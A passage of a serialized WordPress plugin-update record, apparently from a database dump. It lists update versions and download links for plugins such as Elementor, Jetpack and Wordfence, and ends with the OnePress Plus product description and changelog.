ires_php\";b:0;s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:37:\"w.org/plugins/all-in-one-wp-migration\";s:4:\"slug\";s:23:\"all-in-one-wp-migration\";s:6:\"plugin\";s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";s:11:\"new_version\";s:4:\"7.10\";s:3:\"url\";s:54:\"https://wordpress.org/plugins/all-in-one-wp-migration/\";s:7:\"package\";s:71:\"https://downloads.wordpress.org/plugin/all-in-one-wp-migration.7.10.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:76:\"https://ps.w.org/all-in-one-wp-migration/assets/icon-256x256.png?rev=2187156\";s:2:\"1x\";s:76:\"https://ps.w.org/all-in-one-wp-migration/assets/icon-128x128.png?rev=2187156\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:79:\"https://ps.w.org/all-in-one-wp-migration/assets/banner-1544x500.png?rev=2187156\";s:2:\"1x\";s:78:\"https://ps.w.org/all-in-one-wp-migration/assets/banner-772x250.png?rev=2187156\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:3:\"5.3\";s:12:\"requires_php\";s:6:\"5.2.17\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:43:\"all-in-one-seo-pack/all_in_one_seo_pack.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:33:\"w.org/plugins/all-in-one-seo-pack\";s:4:\"slug\";s:19:\"all-in-one-seo-pack\";s:6:\"plugin\";s:43:\"all-in-one-seo-pack/all_in_one_seo_pack.php\";s:11:\"new_version\";s:5:\"3.3.2\";s:3:\"url\";s:50:\"https://wordpress.org/plugins/all-in-one-seo-pack/\";s:7:\"package\";s:68:\"https://downloads.wordpress.org/plugin/all-in-one-seo-pack.3.3.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:72:\"https://ps.w.org/all-in-one-seo-pack/assets/icon-256x256.png?rev=2075006\";s:2:\"1x\";s:72:\"https://ps.w.org/all-in-one-seo-pack/assets/icon-128x128.png?rev=2075006\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:75:\"https://ps.w.org/all-in-one-seo-pack/assets/banner-1544x500.png?rev=1354894\";s:2:\"1x\";s:74:\"https://ps.w.org/all-in-one-seo-pack/assets/banner-772x250.png?rev=1354894\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:3:\"5.3\";s:12:\"requires_php\";s:5:\"5.2.4\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:23:\"elementor/elementor.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:23:\"w.org/plugins/elementor\";s:4:\"slug\";s:9:\"elementor\";s:6:\"plugin\";s:23:\"elementor/elementor.php\";s:11:\"new_version\";s:5:\"2.7.5\";s:3:\"url\";s:40:\"https://wordpress.org/plugins/elementor/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/plugin/elementor.2.7.5.zip\";s:5:\"icons\";a:3:{s:2:\"2x\";s:62:\"https://ps.w.org/elementor/assets/icon-256x256.png?rev=1427768\";s:2:\"1x\";s:54:\"https://ps.w.org/elementor/assets/icon.svg?rev=1426809\";s:3:\"svg\";s:54:\"https://ps.w.org/elementor/assets/icon.svg?rev=1426809\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/elementor/assets/banner-1544x500.png?rev=1475479\";s:2:\"1x\";s:64:\"https://ps.w.org/elementor/assets/banner-772x250.png?rev=1475479\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:3:\"5.3\";s:12:\"requires_php\";s:3:\"5.4\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:19:\"jetpack/jetpack.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:21:\"w.org/plugins/jetpack\";s:4:\"slug\";s:7:\"jetpack\";s:6:\"plugin\";s:19:\"jetpack/jetpack.php\";s:11:\"new_version\";s:3:\"7.9\";s:3:\"url\";s:38:\"https://wordpress.org/plugins/jetpack/\";s:7:\"package\";s:54:\"https://downloads.wordpress.org/plugin/jetpack.7.9.zip\";s:5:\"icons\";a:3:{s:2:\"2x\";s:60:\"https://ps.w.org/jetpack/assets/icon-256x256.png?rev=1791404\";s:2:\"1x\";s:52:\"https://ps.w.org/jetpack/assets/icon.svg?rev=1791404\";s:3:\"svg\";s:52:\"https://ps.w.org/jetpack/assets/icon.svg?rev=1791404\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/jetpack/assets/banner-1544x500.png?rev=1791404\";s:2:\"1x\";s:62:\"https://ps.w.org/jetpack/assets/banner-772x250.png?rev=1791404\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:3:\"5.3\";s:12:\"requires_php\";s:3:\"5.6\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:35:\"login-recaptcha/login-nocaptcha.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:29:\"w.org/plugins/login-recaptcha\";s:4:\"slug\";s:15:\"login-recaptcha\";s:6:\"plugin\";s:35:\"login-recaptcha/login-nocaptcha.php\";s:11:\"new_version\";s:5:\"1.6.5\";s:3:\"url\";s:46:\"https://wordpress.org/plugins/login-recaptcha/\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/plugin/login-recaptcha.1.6.5.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:68:\"https://ps.w.org/login-recaptcha/assets/icon-256x256.png?rev=1137538\";s:2:\"1x\";s:68:\"https://ps.w.org/login-recaptcha/assets/icon-128x128.png?rev=1137538\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:71:\"https://ps.w.org/login-recaptcha/assets/banner-1544x500.png?rev=1137538\";s:2:\"1x\";s:70:\"https://ps.w.org/login-recaptcha/assets/banner-772x250.png?rev=1137538\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:3:\"5.3\";s:12:\"requires_php\";b:0;s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:25:\"maxbuttons/maxbuttons.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:24:\"w.org/plugins/maxbuttons\";s:4:\"slug\";s:10:\"maxbuttons\";s:6:\"plugin\";s:25:\"maxbuttons/maxbuttons.php\";s:11:\"new_version\";s:6:\"7.13.3\";s:3:\"url\";s:41:\"https://wordpress.org/plugins/maxbuttons/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/plugin/maxbuttons.7.13.3.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:63:\"https://ps.w.org/maxbuttons/assets/icon-128x128.png?rev=1378636\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:65:\"https://ps.w.org/maxbuttons/assets/banner-772x250.png?rev=1271156\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:3:\"5.3\";s:12:\"requires_php\";s:3:\"5.6\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:27:\"updraftplus/updraftplus.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:25:\"w.org/plugins/updraftplus\";s:4:\"slug\";s:11:\"updraftplus\";s:6:\"plugin\";s:27:\"updraftplus/updraftplus.php\";s:11:\"new_version\";s:7:\"1.16.20\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/updraftplus/\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/plugin/updraftplus.1.16.20.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:64:\"https://ps.w.org/updraftplus/assets/icon-256x256.jpg?rev=1686200\";s:2:\"1x\";s:64:\"https://ps.w.org/updraftplus/assets/icon-128x128.jpg?rev=1686200\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/updraftplus/assets/banner-1544x500.png?rev=1686200\";s:2:\"1x\";s:66:\"https://ps.w.org/updraftplus/assets/banner-772x250.png?rev=1686200\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:3:\"5.3\";s:12:\"requires_php\";b:0;s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:23:\"wordfence/wordfence.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:23:\"w.org/plugins/wordfence\";s:4:\"slug\";s:9:\"wordfence\";s:6:\"plugin\";s:23:\"wordfence/wordfence.php\";s:11:\"new_version\";s:5:\"7.4.1\";s:3:\"url\";s:40:\"https://wordpress.org/plugins/wordfence/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/plugin/wordfence.7.4.1.zip\";s:5:\"icons\";a:3:{s:2:\"2x\";s:62:\"https://ps.w.org/wordfence/assets/icon-256x256.png?rev=2070855\";s:2:\"1x\";s:54:\"https://ps.w.org/wordfence/assets/icon.svg?rev=2070865\";s:3:\"svg\";s:54:\"https://ps.w.org/wordfence/assets/icon.svg?rev=2070865\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/wordfence/assets/banner-1544x500.jpg?rev=2124102\";s:2:\"1x\";s:64:\"https://ps.w.org/wordfence/assets/banner-772x250.jpg?rev=2124102\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:3:\"5.3\";s:12:\"requires_php\";s:3:\"5.3\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:23:\"wp-cerber/wp-cerber.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:23:\"w.org/plugins/wp-cerber\";s:4:\"slug\";s:9:\"wp-cerber\";s:6:\"plugin\";s:23:\"wp-cerber/wp-cerber.php\";s:11:\"new_version\";s:5:\"8.5.3\";s:3:\"url\";s:40:\"https://wordpress.org/plugins/wp-cerber/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/plugin/wp-cerber.8.5.3.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:62:\"https://ps.w.org/wp-cerber/assets/icon-256x256.png?rev=1241659\";s:2:\"1x\";s:62:\"https://ps.w.org/wp-cerber/assets/icon-128x128.png?rev=1241659\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:64:\"https://ps.w.org/wp-cerber/assets/banner-772x250.jpg?rev=1237452\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:3:\"5.3\";s:12:\"requires_php\";s:3:\"5.4\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:24:\"wpforms-lite/wpforms.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:26:\"w.org/plugins/wpforms-lite\";s:4:\"slug\";s:12:\"wpforms-lite\";s:6:\"plugin\";s:24:\"wpforms-lite/wpforms.php\";s:11:\"new_version\";s:7:\"1.5.6.2\";s:3:\"url\";s:43:\"https://wordpress.org/plugins/wpforms-lite/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/plugin/wpforms-lite.1.5.6.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/wpforms-lite/assets/icon-256x256.png?rev=1371112\";s:2:\"1x\";s:65:\"https://ps.w.org/wpforms-lite/assets/icon-128x128.png?rev=1371112\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:68:\"https://ps.w.org/wpforms-lite/assets/banner-1544x500.png?rev=1371112\";s:2:\"1x\";s:67:\"https://ps.w.org/wpforms-lite/assets/banner-772x250.png?rev=1371112\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:3:\"5.3\";s:12:\"requires_php\";s:3:\"5.4\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:29:\"wp-mail-smtp/wp_mail_smtp.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:26:\"w.org/plugins/wp-mail-smtp\";s:4:\"slug\";s:12:\"wp-mail-smtp\";s:6:\"plugin\";s:29:\"wp-mail-smtp/wp_mail_smtp.php\";s:11:\"new_version\";s:5:\"1.7.1\";s:3:\"url\";s:43:\"https://wordpress.org/plugins/wp-mail-smtp/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/plugin/wp-mail-smtp.1.7.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/wp-mail-smtp/assets/icon-256x256.png?rev=1755440\";s:2:\"1x\";s:65:\"https://ps.w.org/wp-mail-smtp/assets/icon-128x128.png?rev=1755440\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:68:\"https://ps.w.org/wp-mail-smtp/assets/banner-1544x500.png?rev=2120094\";s:2:\"1x\";s:67:\"https://ps.w.org/wp-mail-smtp/assets/banner-772x250.png?rev=2120094\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:3:\"5.3\";s:12:\"requires_php\";s:3:\"5.3\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:31:\"onepress-plus/onepress-plus.php\";O:8:\"stdClass\":14:{s:11:\"new_version\";s:5:\"2.1.8\";s:14:\"stable_version\";s:5:\"2.1.8\";s:4:\"name\";s:13:\"OnePress Plus\";s:4:\"slug\";s:13:\"onepress-plus\";s:3:\"url\";s:60:\"https://www.famethemes.com/themes/onepress-plus/?changelog=1\";s:12:\"last_updated\";s:19:\"2018-12-22 02:11:51\";s:8:\"homepage\";s:48:\"https://www.famethemes.com/themes/onepress-plus/\";s:7:\"package\";s:195:\"https://www.famethemes.com/edd-sl/package_download/MTU3MzgyMzM0Mzo4MmI2NDgzYjYyZmU1NTliZTI1YjMzYTk2YjEzODkzODo4NTM3OjQ3NmEzZDhiYTg5MmI0YmU1YzhmMDY2ZDE4NTg2MGE5Omh0dHBzQC8vYmludGFyYS5jb20ubXk6MA==\";s:13:\"download_link\";s:195:\"https://www.famethemes.com/edd-sl/package_download/MTU3MzgyMzM0Mzo4MmI2NDgzYjYyZmU1NTliZTI1YjMzYTk2YjEzODkzODo4NTM3OjQ3NmEzZDhiYTg5MmI0YmU1YzhmMDY2ZDE4NTg2MGE5Omh0dHBzQC8vYmludGFyYS5jb20ubXk6MA==\";s:8:\"sections\";a:2:{s:11:\"description\";s:5129:\"<p>HotSpots <strong>Features</strong><br />\nThe highly anticipated premium version of the <a href=\"https://www.famethemes.com/themes/onepress\">OnePress theme</a></p>\n<p>[siteorigin_widget class=\"SiteOrigin_Widget_Image_Widget\"][/siteorigin_widget]</p>\n<p>	Drag &amp; drop section ordering.<br />\nYou can easily change sectionsâ€™ order by simply dragging and dropping them anywhere you want. Everyone has their own priorities, so we gave you a helping hand.</p>\n<p>	Advanced Section Styling.<br />\nChange section styling to match your style, which includes:</p>\n<ul>\n<li>Background Color</li>\n<li>Background Image</li>\n<li>Background Videos</li>\n<li>Background Parallax Effect</li>\n<li>Dark Style</li>\n<li>Section padding top and bottom</li>\n</ul>\n<p>[siteorigin_widget class=\"SiteOrigin_Widget_Image_Widget\"][/siteorigin_widget][siteorigin_widget class=\"SiteOrigin_Widget_Image_Widget\"][/siteorigin_widget]</p>\n<p>	Showcase your best projects.<br />\nOnePress Plus has the power to <strong>beautifully showcase your projects</strong>, you can do this very easily by just adding them to this the portfolio section.</p>\n<p>	Beautiful section your business needs.<br />\nSupercharge your website with these addition sections offered by OnePress Plus:</p>\n<ul>\n<li>Testimonial</li>\n<li>Pricing</li>\n<li>Google Maps</li>\n<li>Call To Action</li>\n<li>... and lot more.</li>\n</ul>\n<p>[siteorigin_widget class=\"SiteOrigin_Widget_Image_Widget\"][/siteorigin_widget]</p>\n<p>Free vs <strong>Plus</strong><br />\nBuild the website you want with features and options that are powerful.</p>\n<p>            <span class=\"screen-reader-text\">Products</span></p>\n<p>                OnePress</p>\n<p class=\"pricing__sentence\">A free open source one page <br />WordPress theme.</p>\n<p>                OnePress Plus</p>\n<p class=\"pricing__sentence\">A WordPress plugin adds powerful<br /> <strong>premium features</strong> to OnePress</p>\n<p>            Theme Demos<br />\n            <a target=\"_blank\" href=\"http://demos.famethemes.com/onepress\">Demo <span class=\"ti-arrow-top-right\"></span></a><br />\n            <a target=\"_blank\" href=\"http://demos.famethemes.com/onepress-plus\">Demo <span class=\"ti-arrow-top-right\"></span></a></p>\n<p>            WooCommerce Support<br />\n            <span class=\"yes\"></span><br />\n            <span class=\"yes\"></span></p>\n<p>            Drag and drop section orders<br />\n            <span class=\"no\"></span><br />\n            <span class=\"yes\"></span></p>\n<p>            Add New Section<br />\n            <span class=\"no\"></span><br />\n            <span class=\"yes\"></span></p>\n<p>            Styling for all sections<br />\n            <span class=\"no\"></span><br />\n            <span class=\"yes\"></span></p>\n<p>            Hero Section<br />\n            <span class=\"yes\"></span><br />\n            <span class=\"yes\"></span></p>\n<p>            Full Screen<br />\n            <span class=\"yes\"></span><br />\n            <span class=\"yes\"></span></p>\n<p>            Background Video<br />\n            <span class=\"no\"></span><br />\n            <span class=\"yes\"></span></p>\n<p>            Background Slides<br />\n            2<br />\n            Unlimited</p>\n<p>            About Section<br />\n            <span class=\"yes\"></span><br />\n            <span class=\"yes\"></span></p>\n<p>            Number of items<br />\n            3<br />\n            Unlimited</p>\n<p>            Service Section<br />\n            <span class=\"yes\"></span><br />\n            <span class=\"yes\"></span></p>\n<p>            Number of items<br />\n            4<br />\n            Unlimited</p>\n<p>            Counter Section<br />\n            <span class=\"yes\"></span><br />\n            <span class=\"yes\"></span></p>\n<p>            Number of counter items<br />\n            4<br />\n            Unlimited</p>\n<p>            Team Section<br />\n            <span class=\"yes\"></span><br />\n            <span class=\"yes\"></span></p>\n<p>            Number of members<br />\n            4<br />\n            Unlimited</p>\n<p>            Latest News Section<br />\n            <span class=\"yes\"></span><br />\n            <span class=\"yes\"></span></p>\n<p>            Contact Section<br />\n            <span class=\"yes\"></span><br />\n            <span class=\"yes\"></span></p>\n<p>            Google Map Section<br />\n            <span class=\"no\"></span><br />\n            <span class=\"yes\"></span></p>\n<p>            Pricing Section<br />\n            <span class=\"no\"></span><br />\n            <span class=\"yes\"></span></p>\n<p>            Testimonial Section<br />\n            <span class=\"no\"></span><br />\n            <span class=\"yes\"></span></p>\n<p>            Call To Action Section<br />\n            <span class=\"no\"></span><br />\n            <span class=\"yes\"></span></p>\n<p>            Projects Section<br />\n            <span class=\"no\"></span><br />\n            <span class=\"yes\"></span></p>\n<p>            Typography Options<br />\n            <span class=\"no\"></span><br />\n            <span class=\"yes\"></span></p>\n<p>            24/7 Priority Support<br />\n            <span class=\"no\"></span><br />\n            <span class=\"yes\"></span></p>\n\";s:9:\"changelog\";s:6777:\"<p>2.1.4</p>\n<ul>\n<li>FIXED: Header already sent.</li>\n<li>IMPROVED: Gallery section in old WP version.</li>\n</ul>\n<p>2.1.3</p>\n<ul>\n<li>NEW: Add heading font for main post title.</li>\n<li>NEW: Add CTA button target option.</li>\n<li>NEW: Make client section is carousel.</li>\n<li>NEW: Gallery section compatible with Gutenberg Gallery.</li>\n<li>IMPROVED: Customize live preview css for bg color in section Order styling.</li>\n<li>IMPROVED: Improve typogarphy.</li>\n<li>FIXED: Section Order &amp; Styling - the Background Image.</li>\n<li>FIXED: The slider description color.</li>\n</ul>\n<p>2.1.2</p>\n<ul>\n<li>IMPROVED: Improve typography.</li>\n<li>IMPROVED: Improve template portfolios.</li>\n</ul>\n<p>2.1.1</p>\n<ul>\n<li>FIXED: Remove notice when using child theme</li>\n</ul>\n<p>2.1.1</p>\n<ul>\n<li>FIXED: Fix issue lost hero video settings.</li>\n</ul>\n<p>2.1.0</p>\n<ul>\n<li>NEW: Support sections manager.</li>\n<li>NEW: Section Slider.</li>\n<li>IMPROVED: Front page section config.</li>\n</ul>\n<p>2.0.7</p>\n<ul>\n<li>FIXED: Fix section map issue.</li>\n</ul>\n<p>2.0.7</p>\n<ul>\n<li>NEW: Add dots navigation configs.</li>\n<li>NEW: add client image alt attribute.</li>\n<li>IMPROVED: Update load custom css and js.</li>\n<li>IMPROVED: Update sections navigation settings.</li>\n<li>IMPROVED: Update license message.</li>\n<li>FIXED: Fix issue google font url.</li>\n</ul>\n<p>2.0.6</p>\n<ul>\n<li>NEW: Support custom section page styling.</li>\n<li>IMPROVED: Custom section styling.</li>\n</ul>\n<p>2.0.6</p>\n<ul>\n<li>NEW: Support custom section page styling.</li>\n<li>IMPROVED: Custom section styling.</li>\n</ul>\n<p>2.0.3</p>\n<ul>\n<li>NEW: Add Custom testimonial color option.</li>\n<li>IMPROVED: Support page content when Elementor not activated.</li>\n<li>FIXED: Project layout issue.</li>\n</ul>\n<p>2.0.2</p>\n<ul>\n<li>NEW: Support Elementor for front page.</li>\n</ul>\n<p>2.0.1</p>\n<ul>\n<li>REMOVED: Site identity colors, moved to Theme Options -&gt; Header.</li>\n</ul>\n<p>2.0.0</p>\n<ul>\n<li>NEW: Projects layout.</li>\n<li>NEW: Projects page template.</li>\n<li>NEW: View all projects button.</li>\n<li>NEW: Admin dismiss notice.</li>\n<li>NEW: Add hero heading typography.</li>\n<li>NEW: Clients link target settings.</li>\n<li>IMPROVED: auto update function.</li>\n<li>IMPROVED: Hero settings.</li>\n<li>REMOVED: Upsell sections.</li>\n</ul>\n<p>1.2.8</p>\n<ul>\n<li>Improve auto update function.</li>\n</ul>\n<p>1.2.7</p>\n<ul>\n<li>Improve get gallery data function.</li>\n<li>Fix video issue.</li>\n<li>Add custom section full width option.</li>\n<li>Fix map issue.</li>\n</ul>\n<p>1.2.6</p>\n<ul>\n<li>Fix project details on mobile.</li>\n<li>Fix typography.</li>\n</ul>\n<p>1.2.5</p>\n<ul>\n<li>Fix project details.</li>\n</ul>\n<p>1.2.4</p>\n<ul>\n<li>Do not duplicate project details.</li>\n<li>Run shortcode in hero content.</li>\n<li>Add style for CTA button.</li>\n<li>Add Site Title font option.</li>\n<li>Do not effect content by plugins.</li>\n<li>Clean up CSS.</li>\n</ul>\n<p>1.2.3</p>\n<ul>\n<li>Improve parallax.</li>\n<li>Improve ajax projects.</li>\n</ul>\n<p>1.2.2</p>\n<ul>\n<li>Update responsive parallax.</li>\n<li>Update languages file.</li>\n<li>Update license messages.</li>\n</ul>\n<p>1.2.1</p>\n<ul>\n<li>Update parallax.</li>\n<li>Update map section.</li>\n<li>Update sections templates.</li>\n</ul>\n<p>1.2.0</p>\n<ul>\n<li>Sync parallax.</li>\n</ul>\n<p>1.1.9</p>\n<ul>\n<li>Fix a bug could not load gallery js, css when active plus plugin.</li>\n<li>Update video lightbox template.</li>\n<li>Change hero loading icon.</li>\n<li>Make contact form label full width.</li>\n<li>Fix feature align on small dekstop.</li>\n<li>Improve Google Map, remove default API key (You need your own key to show Google Map).</li>\n<li>Improve auto update.</li>\n<li>Update portfolio parallax.</li>\n<li>Update language file.</li>\n</ul>\n<p>1.1.8</p>\n<ul>\n<li>WP 4.7 compatible.</li>\n<li>Sync CSS with OnePress theme.</li>\n<li>Add reason if could not activate license.</li>\n</ul>\n<p>1.1.7</p>\n<ul>\n<li>Improve gallery.</li>\n<li>Support email for team member.</li>\n</ul>\n<p>1.1.6</p>\n<ul>\n<li>Add condition to check address</li>\n<li>Improve header.</li>\n</ul>\n<p>1.1.5</p>\n<ul>\n<li>Improve Section map</li>\n<li>Clean output css.</li>\n</ul>\n<p>1.1.4</p>\n<ul>\n<li>Hide onepress_gallery_disable customizer.</li>\n</ul>\n<p>1.1.3</p>\n<ul>\n<li>Add version to assets url.</li>\n<li>Fix Problem on IE 9+</li>\n<li>Update Style to version 1.2.6</li>\n<li>Add Gallery section.</li>\n</ul>\n<p>1.1.2</p>\n<ul>\n<li>Improve get settings data.</li>\n<li>Update get client data</li>\n<li>Remove function not use.</li>\n<li>Update hero slider.</li>\n<li>Add support demo content.</li>\n<li>Support HTML for custom section description.</li>\n</ul>\n<p>1.1.1</p>\n<ul>\n<li>Fix Google Map API issue.</li>\n<li>Fix Testimonies avatar issue.</li>\n</ul>\n<p>1.1.0</p>\n<ul>\n<li>Use ShortCode within section description.</li>\n<li>Update portfolio conditional var.</li>\n</ul>\n<p>1.0.9</p>\n<ul>\n<li>Fix translation issues.</li>\n<li>Change textdomain to onepress-plus.</li>\n<li>Fix Google map issue on SSL.</li>\n<li>Add selective refresh for customizer.</li>\n<li>Add language .pot file.</li>\n<li>Update clients style.</li>\n<li>Fix bug incorrect image fallback for video bg.</li>\n<li>Fix feature items break layout.</li>\n<li>Support pricing table up to 4 tables.</li>\n</ul>\n<p>1.0.7</p>\n<ul>\n<li>New add map multi markers.</li>\n<li>New add client showcase section.</li>\n<li>Change textarea to editor.</li>\n<li>Improve project loading icon fixed.</li>\n<li>Fix bug show  empty .section-section-area if title empty.</li>\n<li>Add condition to check section heading area.</li>\n</ul>\n<p>1.0.6</p>\n<ul>\n<li>Update hero section template</li>\n<li>Add breadcrumb for single project</li>\n</ul>\n<p>1.0.5</p>\n<ul>\n<li>New add new custom section via Customizer</li>\n<li>New testimonial light style</li>\n<li>New link for member in team section.</li>\n<li>Add more hero layout content.</li>\n<li>Add description field for all section.</li>\n<li>More hooks around each section.</li>\n</ul>\n<p>1.0.4</p>\n<ul>\n<li>Improve Video background, display image on mobile (if background image is set).</li>\n<li>Add an option to replace video with image background on mobile devices.</li>\n<li>Fix a bug sometime lost customize data.</li>\n</ul>\n<p>1.0.3</p>\n<ul>\n<li>Remove parallax settings (move to theme settings).</li>\n<li>Add documentation link to theme dashboard.</li>\n<li>Fix project sections labels</li>\n<li>Remove admin notice.</li>\n<li>Remove duplicate facebook field.</li>\n<li>Fix projects loading icon issue.</li>\n<li>Disable project ajax by default.</li>\n<li>Video Lightbox doesn\'t display in Section Orders &amp; Styling.</li>\n</ul>\n<p>1.0.2</p>\n<ul>\n<li>Change define version number</li>\n</ul>\n<p>1.0.1</p>\n<ul>\n<li>New: Video Lightbox section.</li>\n<li>Fix bugs.</li>\n</ul>\n<p>1.0.0</p>\n<ul>\n<li>Release.</li>\n</ul>\n\";}s:7:\"banners\";a:2:{s:4:\"high\";s:0:\"\";s:3:\"low\";s:0:\"\";}s:5:\"icons\";s:206:\"a:2:{s:2:\"1x\";s:83:\"https://www.famethemes.com/wp-content/uploads/edd/2016/12/onepress_plus_desktop.png\";s:2:\"2x\";s:83:\"https://www.famethemes.com/wp-content/uploads/edd/2016/12/onepress_plus_desktop.png\";}\";s:11:\"description\";a:1:{i:0;s:5129:\"<p>HotSpots <strong>Features</strong><br />\nThe highly anticipated premium version of the <a href=\"https://www.famethemes.com/themes/onepress\">OnePress theme</a></p>\n<p>[siteorigin_widget class=\"SiteOrigin_Widget_Image_Widget\"][/siteorigin_widget]</p>\n<p>	Drag &amp; drop section ordering.<br />\nYou can easily change sectionsâ€™ order by simply dragging and dropping them anywhere you want. Everyone has their own priorities, so we gave you a helping hand.</p>\n<p>	Advanced Section Styling.<br />\nChange section styling to match your style, which includes:</p>\n<ul>\n<li>Background Color</li>\n<li>Background Image</li>\n<li>Background Videos</li>\n<li>Background Parallax Effect</li>\n<li>Dark Style</li>\n<li>Section padding top and bottom</li>\n</ul>\n<p>[siteorigin_widget class=\"SiteOrigin_Widget_Image_Widget\"][/siteorigin_widget][siteorigin_widget class=\"SiteOrigin_Widget_Image_Widget\"][/siteorigin_widget]</p>\n<p>	Showcase your best projects.<br />\nOnePress Plus has the power to <strong>beautifully showcase your projects</strong>, you can do this very easily by just adding them to this the portfolio section.</p>\n<p>	Beautiful section your business needs.<br />\nSupercharge your website with these addition sections offered by OnePress Plus:</p>\n<ul>\n<li>Testimonial</li>\n<li>Pricing</li>\n<li>Google Maps</li>\n<li>Call To Action</li>\n<li>... and lot more.</li>\n</ul>\n<p>[siteorigin_widget class=\"SiteOrigin_Widget_Image_Widget\"][/siteorigin_widget]</p>\n<p>Free vs <strong>Plus</strong><br />\nBuild the website you want with features and options that are powerful.</p>\n<p>            <span class=\"screen-reader-text\">Products</span></p>\n<p>                OnePress</p>\n<p class=\"pricing__sentence\">A free open source one page <br />WordPress theme.</p>\n<p>                OnePress Plus</p>\n<p class=\"pricing__sentence\">A WordPress plugin adds powerful<br /> <strong>premium features</strong> to OnePress</p>\n<p>            Theme Demos<br />\n            <a target=\"_blank\" href=\"http://demos.famethemes.com/onepress\">Demo <span class=\"ti-arrow-top-right\"></span></a><br />\n            <a target=\"_blank\" href=\"http://demos.famethemes.com/onepress-plus\">Demo <span class=\"ti-arrow-top-right\"></span></a></p>\n<p>            WooCommerce Support<br />\n            <span class=\"yes\"></span><br />\n            <span class=\"yes\"></span></p>\n<p>            Drag and drop section orders<br />\n            <span class=\"no\"></span><br />\n            <span class=\"yes\"></span></p>\n<p>            Add New Section<br />\n            <span class=\"no\"></span><br />\n            <span class=\"yes\"></span></p>\n<p>            Styling for all sections<br />\n            <span class=\"no\"></span><br />\n            <span class=\"yes\"></span></p>\n<p>            Hero Section<br />\n            <span class=\"yes\"></span><br />\n            <span class=\"yes\"></span></p>\n<p>            Full Screen<br />\n            <span class=\"yes\"></span><br />\n            <span class=\"yes\"></span></p>\n<p>            Background Video<br />\n            <span class=\"no\"></span><br />\n            <span class=\"yes\"></span></p>\n<p>            Background Slides<br />\n            2<br />\n            Unlimited</p>\n<p>            About Section<br />\n            <span class=\"yes\"></span><br />\n            <span class=\"yes\"></span></p>\n<p>            Number of items<br />\n            3<br />\n            Unlimited</p>\n<p>            Service Section<br />\n            <span class=\"yes\"></span><br />\n            <span class=\"yes\"></span></p>\n<p>            Number of items<br />\n            4<br />\n            Unlimited</p>\n<p>            Counter Section<br />\n            <span class=\"yes\"></span><br />\n            <span class=\"yes\"></span></p>\n<p>            Number of counter items<br />\n            4<br />\n            Unlimited</p>\n<p>            Team Section<br />\n            <span class=\"yes\"></span><br />\n            <span class=\"yes\"></span></p>\n<p>            Number of members<br />\n            4<br />\n            Unlimited</p>\n<p>            Latest News Section<br />\n            <span class=\"yes\"></span><br />\n            <span class=\"yes\"></span></p>\n<p>            Contact Section<br />\n            <span class=\"yes\"></span><br />\n            <span class=\"yes\"></span></p>\n<p>            Google Map Section<br />\n            <span class=\"no\"></span><br />\n            <span 